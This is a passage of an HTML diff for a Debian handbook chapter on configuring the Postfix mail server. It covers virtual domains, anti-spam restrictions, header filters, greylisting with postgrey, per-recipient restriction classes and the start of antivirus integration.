+                  class="emphasis"><em>snake oil</em></span> “medicine” sold by unscrupulous quacks in old times, have absolutely no value: you cannot rely on them to authenticate the server since they are automatically generated self-signed certificates. However they are useful to improve the privacy of the exchanges.
+			</div><div
+                class="para">
+				In general they should only be used for testing purposes, and normal service must use real certificates; these can be generated with the procedure described in <a
+                  class="xref"
+                  href="sect.virtual-private-network.html#sect.easy-rsa">10.2.1.1 – „Public Key Infrastructure: <span
+                    class="emphasis"><em>easy-rsa</em></span>“</a>.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.configuring-virtual-domains"></a>11.1.2. Configuring Virtual Domains</h3></div></div></div><a
+              id="id-1.14.4.8.2"
+              class="indexterm"></a><a
+              id="id-1.14.4.8.3"
+              class="indexterm"></a><div
+              class="para">
+				The mail server can receive emails addressed to other domains besides the main domain; these are then known as virtual domains. In most cases where this happens, the emails are not ultimately destined to local users. Postfix provides two interesting features for handling virtual domains.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CAUTION</em></span> Virtual domains and canonical domains</strong></p></div></div></div><div
+                class="para">
+				None of the virtual domains must be referenced in the <code
+                  class="literal">mydestination</code> variable; this variable only contains the names of the “canonical” domains directly associated to the machine and its local users.
+			</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.8.6"></a>11.1.2.1. Virtual Alias Domains</h4></div></div></div><a
+                id="id-1.14.4.8.6.2"
+                class="indexterm"></a><a
+                id="id-1.14.4.8.6.3"
+                class="indexterm"></a><div
+                class="para">
+					A virtual alias domain only contains aliases, i.e. addresses that only forward emails to other addresses.
+				</div><div
+                class="para">
+					Such a domain is enabled by adding its name to the <code
+                  class="literal">virtual_alias_domains</code> variable, and referencing an address mapping file in the <code
+                  class="literal">virtual_alias_maps</code> variable.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.6.6"></a><p
+                  class="title"><strong>Příklad 11.2. Directives to add in the <code
+                      class="filename">/etc/postfix/main.cf</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+virtual_alias_domains = falcotsbrand.com
+virtual_alias_maps = hash:/etc/postfix/virtual
+</pre></div></div><div
+                class="para">
+					The <code
+                  class="filename">/etc/postfix/virtual</code> file describes a mapping with a rather straightforward syntax: each line contains two fields separated by whitespace; the first field is the alias name, the second field is a list of email addresses where it redirects. The special <code
+                  class="literal">@domain.com</code> syntax covers all remaining aliases in a domain.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.6.8"></a><p
+                  class="title"><strong>Příklad 11.3. Example <code
+                      class="filename">/etc/postfix/virtual</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+webmaster@falcotsbrand.com  jean@falcot.com
+contact@falcotsbrand.com    laure@falcot.com, sophie@falcot.com
+# The alias below is generic and covers all addresses within 
+# the falcotsbrand.com domain not otherwise covered by this file.
+# These addresses forward email to the same user name in the
+# falcot.com domain.
+@falcotsbrand.com           @falcot.com
+</pre></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.8.7"></a>11.1.2.2. Virtual Mailbox Domains</h4></div></div></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>CAUTION</em></span> Combined virtual domain?</strong></p></div></div></div><div
+                  class="para">
+					Postfix does not allow using the same domain in both <code
+                    class="literal">virtual_alias_domains</code> and <code
+                    class="literal">virtual_mailbox_domains</code>. However, every domain of <code
+                    class="literal">virtual_mailbox_domains</code> is implicitly included in <code
+                    class="literal">virtual_alias_domains</code>, which makes it possible to mix aliases and mailboxes within a virtual domain.
+				</div></div><a
+                id="id-1.14.4.8.7.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.8.7.4"
+                class="indexterm"></a><div
+                class="para">
+					Messages addressed to a virtual mailbox domain are stored in mailboxes not assigned to a local system user.
+				</div><div
+                class="para">
+					Enabling a virtual mailbox domain requires naming this domain in the <code
+                  class="literal">virtual_mailbox_domains</code> variable, and referencing a mailbox mapping file in <code
+                  class="literal">virtual_mailbox_maps</code>. The <code
+                  class="literal">virtual_mailbox_base</code> parameter contains the directory under which the mailboxes will be stored.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">virtual_uid_maps</code> parameter (respectively <code
+                  class="literal">virtual_gid_maps</code>) references the file containing the mapping between the email address and the system user (respectively group) that “owns” the corresponding mailbox. To get all mailboxes owned by the same owner/group, the <code
+                  class="literal">static:5000</code> syntax assigns a fixed UID/GID (of value 5000 here).
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.7.8"></a><p
+                  class="title"><strong>Příklad 11.4. Directives to add in the <code
+                      class="filename">/etc/postfix/main.cf</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+virtual_mailbox_domains = falcot.org
+virtual_mailbox_maps = hash:/etc/postfix/vmailbox
+virtual_mailbox_base = /var/mail/vhosts
+</pre></div></div><div
+                class="para">
+					Again, the syntax of the <code
+                  class="filename">/etc/postfix/vmailbox</code> file is quite straightforward: two fields separated with whitespace. The first field is an email address within one of the virtual domains, and the second field is the location of the associated mailbox (relative to the directory specified in <span
+                  class="emphasis"><em>virtual_mailbox_base</em></span>). If the mailbox name ends with a slash (<code
+                  class="literal">/</code>), the emails will be stored in the <span
+                  class="emphasis"><em>maildir</em></span> format; otherwise, the traditional <span
+                  class="emphasis"><em>mbox</em></span> format will be used. The <span
+                  class="emphasis"><em>maildir</em></span> format uses a whole directory to store a mailbox, each individual message being stored in a separate file. In the <span
+                  class="emphasis"><em>mbox</em></span> format, on the other hand, the whole mailbox is stored in one file, and each line starting with “<code
+                  class="literal">From </code>” (<code
+                  class="literal">From</code> followed by a space) signals the start of a new message.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.8.7.10"></a><p
+                  class="title"><strong>Příklad 11.5. The <code
+                      class="filename">/etc/postfix/vmailbox</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+# Jean's email is stored as maildir, with
+# one file per email in a dedicated directory
+jean@falcot.org falcot.org/jean/
+# Sophie's email is stored in a traditional "mbox" file,
+# with all mails concatenated into one single file
+sophie@falcot.org falcot.org/sophie
+</pre></div></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.restrictions-for-receiving-and-sending"></a>11.1.3. Restrictions for Receiving and Sending</h3></div></div></div><div
+              class="para">
+				The growing number of unsolicited bulk emails (<span
+                class="emphasis"><em>spam</em></span>) requires being increasingly strict when deciding which emails a server should accept. This section presents some of the strategies included in Postfix.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> The spam problem</strong></p></div></div></div><a
+                id="id-1.14.4.9.3.2"
+                class="indexterm"></a><div
+                class="para">
+				“Spam” is a generic term used to designate all the unsolicited commercial emails (also known as UCEs) that flood our electronic mailboxes; the unscrupulous individuals sending them are known as spammers. They care little about the nuisance they cause, since sending an email costs very little, and only a very small percentage of recipients need to be attracted by the offers for the spamming operation to make more money than it costs. The process is mostly automated, and any email address made public (for instance, on a web forum, or on the archives of a mailing list, or on a blog, and so on) will be discovered by the spammers' robots, and subjected to a never-ending stream of unsolicited messages.
+			</div><div
+                class="para">
+				All system administrators try to face this nuisance with spam filters, but of course spammers keep adjusting to try to work around these filters. Some even rent networks of machines compromised by a worm from various crime syndicates. Recent statistics estimate that up to 95% of all emails circulating on the Internet are spam!
+			</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.4"></a>11.1.3.1. IP-Based Access Restrictions</h4></div></div></div><div
+                class="para">
+					The <code
+                  class="literal">smtpd_client_restrictions</code> directive controls which machines are allowed to communicate with the email server.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.4.3"></a><p
+                  class="title"><strong>Příklad 11.6. Restrictions Based on Client Address</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_client_restrictions = permit_mynetworks,
+    warn_if_reject reject_unknown_client,
+    check_client_access hash:/etc/postfix/access_clientip,
+    reject_rbl_client sbl-xbl.spamhaus.org,
+    reject_rbl_client list.dsbl.org
+</pre></div></div><div
+                class="para">
+					When a variable contains a list of rules, as in the example above, these rules are evaluated in order, from the first to the last. Each rule can accept the message, reject it, or leave the decision to a following rule. As a consequence, order matters, and simply switching two rules can lead to a widely different behavior.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">permit_mynetworks</code> directive, used as the first rule, accepts all emails coming from a machine in the local network (as defined by the <span
+                  class="emphasis"><em>mynetworks</em></span> configuration variable).
+				</div><div
+                class="para">
+					The second directive would normally reject emails coming from machines without a completely valid DNS configuration. Such a valid configuration means that the IP address can be resolved to a name, and that this name, in turn, resolves to the IP address. This restriction is often too strict, since many email servers do not have a reverse DNS for their IP address. This explains why the Falcot administrators prepended the <code
+                  class="literal">warn_if_reject</code> modifier to the <code
+                  class="literal">reject_unknown_client</code> directive: this modifier turns the rejection into a simple warning recorded in the logs. The administrators can then keep an eye on the number of messages that would be rejected if the rule were actually enforced, and make an informed decision later if they wish to enable such enforcement.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> <span
+                            class="emphasis"><em>access</em></span> tables</strong></p></div></div></div><div
+                  class="para">
+					The restriction criteria include administrator-modifiable tables listing combinations of senders, IP addresses, and allowed or forbidden hostnames. These tables can be created from an uncompressed copy of the <code
+                    class="filename">/usr/share/doc/postfix-doc/examples/access.gz</code> file. This model is self-documented in its comments, which means each table describes its own syntax.
+				</div><div
+                  class="para">
+					The <code
+                    class="filename">/etc/postfix/access_clientip</code> table lists IP addresses and networks; <code
+                    class="filename">/etc/postfix/access_helo</code> lists domain names; <code
+                    class="filename">/etc/postfix/access_sender</code> contains sender email addresses. All these files need to be turned into hash-tables (a format optimized for fast access) after each change, with the <code
+                    class="command">postmap /etc/postfix/<em
+                      class="replaceable">file</em></code> command.
+				</div></div><div
+                class="para">
+					The third directive allows the administrator to set up a blacklist and a whitelist of email servers, stored in the <code
+                  class="filename">/etc/postfix/access_clientip</code> file. Servers in the whitelist are considered as trusted, and the emails coming from there therefore do not go through the following filtering rules.
+				</div><div
+                class="para">
+					The last two rules reject any message coming from a server listed in one of the indicated blacklists. RBL is an acronym for <span
+                  class="emphasis"><em>Remote Black List</em></span>; there are several such lists, but they all list badly configured servers that spammers use to relay their emails, as well as unexpected mail relays such as machines infected with worms or viruses.
+				</div><a
+                id="id-1.14.4.9.4.10"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.4.11"
+                class="indexterm"></a><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TIP</em></span> White list and RBLs</strong></p></div></div></div><div
+                  class="para">
+					Blacklists sometimes include a legitimate server that has been suffering an incident. In these situations, all emails coming from one of these servers would be rejected unless the server is listed in a whitelist defined by <code
+                    class="filename">/etc/postfix/access_clientip</code>.
+				</div><div
+                  class="para">
+					Prudence therefore recommends including in the whitelist all the trusted servers from which many emails are usually received.
+				</div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.5"></a>11.1.3.2. Checking the Validity of the <code
+                        class="literal">EHLO</code> or <code
+                        class="literal">HELO</code> Commands</h4></div></div></div><div
+                class="para">
+					Each SMTP exchange starts with a <code
+                  class="literal">HELO</code> (or <code
+                  class="literal">EHLO</code>) command, followed by the name of the sending email server; checking the validity of this name can be interesting.
+				</div><a
+                id="id-1.14.4.9.5.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.5.4"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.5.5"></a><p
+                  class="title"><strong>Příklad 11.7. Restrictions on the name announced in <code
+                      class="literal">EHLO</code></strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_helo_restrictions = permit_mynetworks,
+    reject_invalid_hostname,
+    check_helo_access hash:/etc/postfix/access_helo,
+    reject_non_fqdn_hostname,
+    warn_if_reject reject_unknown_hostname
+</pre></div></div><div
+                class="para">
+					The first <code
+                  class="literal">permit_mynetworks</code> directive allows all machines on the local network to introduce themselves freely. This is important, because some email programs do not respect this part of the SMTP protocol adequately enough, and they can introduce themselves with nonsensical names.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">reject_invalid_hostname</code> rule rejects emails when the <code
+                  class="literal">EHLO</code> announce lists a syntactically incorrect hostname. The <code
+                  class="literal">reject_non_fqdn_hostname</code> rule rejects messages when the announced hostname is not a fully-qualified domain name (including a domain name as well as a host name). The <code
+                  class="literal">reject_unknown_hostname</code> rule rejects messages if the announced name does not exist in the DNS. Since this last rule unfortunately leads to too many rejections, the administrators turned its effect to a simple warning with the <code
+                  class="literal">warn_if_reject</code> modifier as a first step; they may decide to remove this modifier at a later stage, after auditing the results of this rule.
+				</div><div
+                class="para">
+					Using <code
+                  class="literal">permit_mynetworks</code> as the first rule has an interesting side effect: the following rules only apply to hosts outside the local network. This allows blacklisting all hosts that announce themselves as part of the <code
+                  class="literal">falcot.com</code>, for instance by adding a <code
+                  class="literal">falcot.com REJECT You are not in our network!</code> line to the <code
+                  class="filename">/etc/postfix/access_helo</code> file.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.6"></a>11.1.3.3. Accepting or Refusing Based on the Announced Sender</h4></div></div></div><div
+                class="para">
+					Every message has a sender, announced by the <code
+                  class="literal">MAIL FROM</code> command of the SMTP protocol; again, this information can be validated in several different ways.
+				</div><a
+                id="id-1.14.4.9.6.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.6.4"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.6.5"></a><p
+                  class="title"><strong>Příklad 11.8. Sender checks</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_sender_restrictions = 
+    check_sender_access hash:/etc/postfix/access_sender,
+    reject_unknown_sender_domain, reject_unlisted_sender,
+    reject_non_fqdn_sender
+</pre></div></div><div
+                class="para">
+					The <code
+                  class="filename">/etc/postfix/access_sender</code> table maps some special treatment to some senders. This usually means listing some senders into a white list or a black list.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">reject_unknown_sender_domain</code> rule requires a valid sender domain, since it is needed for a valid address. The <code
+                  class="literal">reject_unlisted_sender</code> rule rejects local senders if the address does not exist; this prevents emails from being sent from an invalid address in the <code
+                  class="literal">falcot.com</code> domain, and messages emanating from <code
+                  class="literal">joe.bloggs@falcot.com</code> are only accepted if such an address really exists.
+				</div><div
+                class="para">
+					Finally, the <code
+                  class="literal">reject_non_fqdn_sender</code> rule rejects emails purporting to come from addresses without a fully-qualified domain name. In practice, this means rejecting emails coming from <code
+                  class="literal">user@machine</code>: the address must be announced as either <code
+                  class="literal">user@machine.example.com</code> or <code
+                  class="literal">user@example.com</code>.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.7"></a>11.1.3.4. Accepting or Refusing Based on the Recipient</h4></div></div></div><div
+                class="para">
+					Each email has at least one recipient, announced with the <code
+                  class="literal">RCPT TO</code> command in the SMTP protocol. These addresses also warrant validation, even if that may be less relevant than the checks made on the sender address.
+				</div><a
+                id="id-1.14.4.9.7.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.9.7.4"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.7.5"></a><p
+                  class="title"><strong>Příklad 11.9. Recipient checks</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_recipient_restrictions = permit_mynetworks, 
+    reject_unauth_destination, reject_unlisted_recipient, 
+    reject_non_fqdn_recipient
+</pre></div></div><div
+                class="para">
+					<code
+                  class="literal">reject_unauth_destination</code> is the basic rule that requires outside messages to be addressed to us; messages sent to an address not served by this server are rejected. Without this rule, a server becomes an open relay that allows spammers to send unsolicited emails; this rule is therefore mandatory, and it will be best included near the beginning of the list, so that no other rules may authorize the message before its destination has been checked.
+				</div><div
+                class="para">
+					The <code
+                  class="literal">reject_unlisted_recipient</code> rule rejects messages sent to non-existing local users, which makes sense. Finally, the <code
+                  class="literal">reject_non_fqdn_recipient</code> rule rejects non-fully-qualified addresses; this makes it impossible to send an email to <code
+                  class="literal">jean</code> or <code
+                  class="literal">jean@machine</code>, and requires using the full address instead, such as <code
+                  class="literal">jean@machine.falcot.com</code> or <code
+                  class="literal">jean@falcot.com</code>.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.8"></a>11.1.3.5. Restrictions Associated with the <code
+                        class="literal">DATA</code> Command</h4></div></div></div><div
+                class="para">
+					The <code
+                  class="literal">DATA</code> command of SMTP is emitted before the contents of the message. It doesn't provide any information per se, apart from announcing what comes next. It can still be subjected to checks.
+				</div><a
+                id="id-1.14.4.9.8.3"
+                class="indexterm"></a><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.8.4"></a><p
+                  class="title"><strong>Příklad 11.10. <code
+                      class="literal">DATA</code> checks</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+smtpd_data_restrictions = reject_unauth_pipelining
+</pre></div></div><div
+                class="para">
+					The <code
+                  class="literal">reject_unauth_pipelining</code> directives causes the message to be rejected if the sending party sends a command before the reply to the previous command has been sent. This guards against a common optimization used by spammer robots, since they usually don't care a fig about replies and only focus on sending as many emails as possible in as short a time as possible.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.9"></a>11.1.3.6. Applying Restrictions</h4></div></div></div><div
+                class="para">
+					Although the above commands validate information at various stages of the SMTP exchange, Postfix only sends the actual rejection as a reply to the <code
+                  class="literal">RCPT TO</code> command.
+				</div><div
+                class="para">
+					This means that even if the message is rejected due to an invalid <code
+                  class="literal">EHLO</code> command, Postfix knows the sender and the recipient when announcing the rejection. It can then log a more explicit message than it could if the transaction had been interrupted from the start. In addition, a number of SMTP clients do not expect failures on the early SMTP commands, and these clients will be less disturbed by this late rejection.
+				</div><div
+                class="para">
+					A final advantage to this choice is that the rules can accumulate information during the various stages of the SMTP exchange; this allows defining more fine-grained permissions, such as rejecting a non-local connection if it announces itself with a local sender.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.4.9.10"></a>11.1.3.7. Filtering Based on the Message Contents</h4></div></div></div><div
+                class="para">
+					The validation and restriction system would not be complete without a way to apply checks to the message contents. Postfix differentiates the checks applying to the email headers from those applying to the email body.
+				</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.10.3"></a><p
+                  class="title"><strong>Příklad 11.11. Enabling content-based filters</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+header_checks = regexp:/etc/postfix/header_checks
+body_checks = regexp:/etc/postfix/body_checks
+</pre></div></div><a
+                id="id-1.14.4.9.10.4"
+                class="indexterm"></a><div
+                class="para">
+					Both files contain a list of regular expressions (commonly known as <span
+                  class="emphasis"><em>regexps</em></span> or <span
+                  class="emphasis"><em>regexes</em></span>) and associated actions to be triggered when the email headers (or body) match the expression.
+				</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>QUICK LOOK</em></span> Regexp tables</strong></p></div></div></div><div
+                  class="para">
+					The <code
+                    class="filename">/usr/share/doc/postfix-doc/examples/header_checks.gz</code> file contains many explanatory comments and can be used as a starting point for creating the <code
+                    class="filename">/etc/postfix/header_checks</code> and <code
+                    class="filename">/etc/postfix/body_checks</code> files.
+				</div></div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.4.9.10.7"></a><p
+                  class="title"><strong>Příklad 11.12. Example <code
+                      class="filename">/etc/postfix/header_checks</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+/^X-Mailer: GOTO Sarbacane/ REJECT I fight spam (GOTO Sarbacane)
+/^Subject: *Your email contains VIRUSES/ DISCARD virus notification
+</pre></div></div><div
+                class="sidebar"><a
+                  xmlns=""
+                  id="sidebar.regexp"></a><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>BACK TO BASICS</em></span> Regular expression</strong></p></div></div></div><div
+                  class="para">
+					The <span
+                    class="emphasis"><em>regular expression</em></span> term (shortened to <span
+                    class="emphasis"><em>regexp</em></span> or <span
+                    class="emphasis"><em>regex</em></span>) references a generic notation for expressing a description of the contents and/or structure of a string of characters. Certain special characters allow defining alternatives (for instance, <code
+                    class="literal">foo|bar</code> matches either “foo” or “bar”), sets of allowed characters (for instance, <code
+                    class="literal">[0-9]</code> means any digit, and <code
+                    class="literal">.</code> — a dot — means any character), quantifications (<code
+                    class="literal">s?</code> matches either <code
+                    class="literal">s</code> or the empty string, in other words 0 or 1 occurrence of <code
+                    class="literal">s</code>; <code
+                    class="literal">s+</code> matches one or more consecutive <code
+                    class="literal">s</code> characters; and so on). Parentheses allow grouping search results.
+				</div><div
+                  class="para">
+					The precise syntax of these expressions varies across the tools using them, but the basic features are similar. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://en.wikipedia.org/wiki/Regular_expression">http://en.wikipedia.org/wiki/Regular_expression</a></div>
+				</div></div><div
+                class="para">
+					The first one checks the header mentioning the email software; if <code
+                  class="literal">GOTO Sarbacane</code> (a bulk email software) is found, the message is rejected. The second expression controls the message subject; if it mentions a virus notification, we can decide not to reject the message but to discard it immediately instead.
+				</div><div
+                class="para">
+					Using these filters is a double-edged sword, because it is easy to make the rules too generic and to lose legitimate emails as a consequence. In these cases, not only the messages will be lost, but their senders will get unwanted (and annoying) error messages.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.setting-up-greylisting"></a>11.1.4. Setting Up <span
+                      class="foreignphrase"><em
+                        class="foreignphrase">greylisting</em></span></h3></div></div></div><a
+              id="id-1.14.4.10.2"
+              class="indexterm"></a><div
+              class="para">
+				“Greylisting” is a filtering technique according to which a message is initially rejected with a temporary error code, and only accepted on a further try after some delay. This filtering is particularly efficient against spam sent by the many machines infected by worms and viruses, since this software rarely acts as a full SMTP agent (by checking the error code and retrying failed messages later), especially since many of the harvested addresses are really invalid and retrying would only mean losing time.
+			</div><div
+              class="para">
+				Postfix doesn't provide greylisting natively, but there is a feature by which the decision to accept or reject a given message can be delegated to an external program. The <span
+                class="pkg pkg">postgrey</span> package contains just such a program, designed to interface with this access policy delegation service.
+			</div><div
+              class="para">
+				Once <span
+                class="pkg pkg">postgrey</span> is installed, it runs as a daemon and listens on port 10023. Postfix can then be configured to use it, by adding the <code
+                class="literal">check_policy_service</code> parameter as an extra restriction:
+			</div><pre
+              class="programlisting">
+smtpd_recipient_restrictions = permit_mynetworks,
+    [...]
+    check_policy_service inet:127.0.0.1:10023
+</pre><div
+              class="para">
+				Each time Postfix reaches this rule in the ruleset, it will connect to the <code
+                class="command">postgrey</code> daemon and send it information concerning the relevant message. On its side, Postgrey considers the IP address/sender/recipient triplet and checks in its database whether that same triplet has been seen recently. If so, Postgrey replies that the message should be accepted; if not, the reply indicates that the message should be temporarily rejected, and the triplet gets recorded in the database.
+			</div><div
+              class="para">
+				The main disadvantage of greylisting is that legitimate messages get delayed, which is not always acceptable. It also increases the burden on servers that send many legitimate emails.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Shortcomings of greylisting</strong></p></div></div></div><div
+                class="para">
+				Theoretically, greylisting should only delay the first mail from a given sender to a given recipient, and the typical delay is in the order of minutes. Reality, however, can differ slightly. Some large ISPs use clusters of SMTP servers, and when a message is initially rejected, the server that retries the transmission may not be the same as the initial one. When that happens, the second server gets a temporary error message due to greylisting too, and so on; it may take several hours until transmission is attempted by a server that has already been involved, since SMTP servers usually increase the delay between retries at each failure.
+			</div><div
+                class="para">
+				As a consequence, the incoming IP address may vary in time even for a single sender. But it goes further: even the sender address can change. For instance, many mailing-list servers encode extra information in the sender address so as to be able to handle error messages (known as <span
+                  class="emphasis"><em>bounces</em></span>). Each new message sent to a mailing-list may then need to go through greylisting, which means it has to be stored (temporarily) on the sender's server. For very large mailing-lists (with tens of thousands of subscribers), this can soon become a problem.
+			</div><div
+                class="para">
+				To mitigate these drawbacks, Postgrey manages a whitelist of such sites, and messages emanating from them are immediately accepted without going through greylisting. This list can easily be adapted to local needs, since it is stored in the <code
+                  class="filename">/etc/postgrey/whitelist_clients</code> file.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Selective greylisting with <span
+                          class="pkg pkg">milter-greylist</span></strong></p></div></div></div><div
+                class="para">
+				The drawbacks of greylisting can be mitigated by only using greylisting on the subset of clients that are already considered as probable sources of spam (because they are listed in a DNS blacklist). This is not possible with <span
+                  class="pkg pkg">postgrey</span> but <span
+                  class="pkg pkg">milter-greylist</span> can be used in such a way.
+			</div><div
+                class="para">
+				In that scenario, since DNS blacklists never triggers a definitive rejection, it becomes reasonable to use aggressive blacklists, including those listing all dynamic IP addresses from ISP clients (such as <code
+                  class="literal">pbl.spamhaus.org</code> or <code
+                  class="literal">dul.dnsbl.sorbs.net</code>).
+			</div><div
+                class="para">
+				Since milter-greylist uses Sendmail's milter interface, the postfix side of its configuration is limited to “<code
+                  class="literal">smtpd_milters = unix:/var/run/milter-greylist/milter-greylist.sock</code>”. The <span
+                  class="citerefentry"><span
+                    class="refentrytitle">greylist.conf</span>(5)</span> manual page documents <code
+                  class="filename">/etc/milter-greylist/greylist.conf</code> and the numerous ways to configure milter-greylist. You will also have to edit <code
+                  class="filename">/etc/default/milter-greylist</code> to actually enable the service.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.4.11"></a>11.1.5. Customizing Filters Based On the Recipient</h3></div></div></div><div
+              class="para">
+				<a
+                class="xref"
+                href="network-services.html#sect.restrictions-for-receiving-and-sending">11.1.3 – „Restrictions for Receiving and Sending“</a> and <a
+                class="xref"
+                href="network-services.html#sect.setting-up-greylisting">11.1.4 – „Setting Up <span
+                  class="foreignphrase"><em
+                    class="foreignphrase">greylisting</em></span>“</a> reviewed many of the possible restrictions. They all have their use in limiting the amount of received spam, but they also all have their drawbacks. It is therefore more and more common to customize the set of filters depending on the recipient. At Falcot Corp, greylisting is interesting for most users, but it hinders the work of some users who need low latency in their emails (such as the technical support service). Similarly, the commercial service sometimes has problems receiving emails from some Asian providers who may be listed in blacklists; this service asked for a non-filtered address so as to be able to correspond.
+			</div><div
+              class="para">
+				Postfix provides such a customization of filters with a “restriction class” concept. The classes are declared in the <code
+                class="literal">smtpd_restriction_classes</code> parameter, and defined the same way as <code
+                class="literal">smtpd_recipient_restrictions</code>. The <code
+                class="literal">check_recipient_access</code> directive then defines a table mapping a given recipient to the appropriate set of restrictions.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.11.4"></a><p
+                class="title"><strong>Příklad 11.13. Defining restriction classes in <code
+                    class="filename">main.cf</code></strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">smtpd_restriction_classes = greylisting, aggressive, permissive
+
+greylisting = check_policy_service inet:127.0.0.1:10023
+aggressive = reject_rbl_client sbl-xbl.spamhaus.org,
+        check_policy_service inet:127.0.0.1:10023
+permissive = permit
+
+smtpd_recipient_restrictions = permit_mynetworks,
+        reject_unauth_destination,
+        check_recipient_access hash:/etc/postfix/recipient_access
+</pre></div></div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.11.5"></a><p
+                class="title"><strong>Příklad 11.14. The <code
+                    class="filename">/etc/postfix/recipient_access</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# Unfiltered addresses
+postmaster@falcot.com  permissive
+support@falcot.com     permissive
+sales-asia@falcot.com  permissive
+
+# Aggressive filtering for some privileged users
+joe@falcot.com         aggressive
+
+# Special rule for the mailing-list manager
+sympa@falcot.com       reject_unverified_sender
+
+# Greylisting by default
+falcot.com             greylisting
+</pre></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.postfix-antivirus"></a>11.1.6. Integrating an Antivirus</h3></div></div></div><a
+              id="id-1.14.4.12.2"
+              class="indexterm"></a><div
+              class="para">
+				The many viruses circulating as attachments to emails make it important to set up an antivirus at the entry point of the company network, since despite an awareness campaign, some users will still open attachments from obviously shady messages.
+			</div><div
+              class="para">
+				The Falcot administrators selected <code
+                class="command">clamav</code> for their free antivirus. The main package is <span
+                class="pkg pkg">clamav</span>, but they also installed a few extra packages such as <span
+                class="pkg pkg">arj</span>, <span
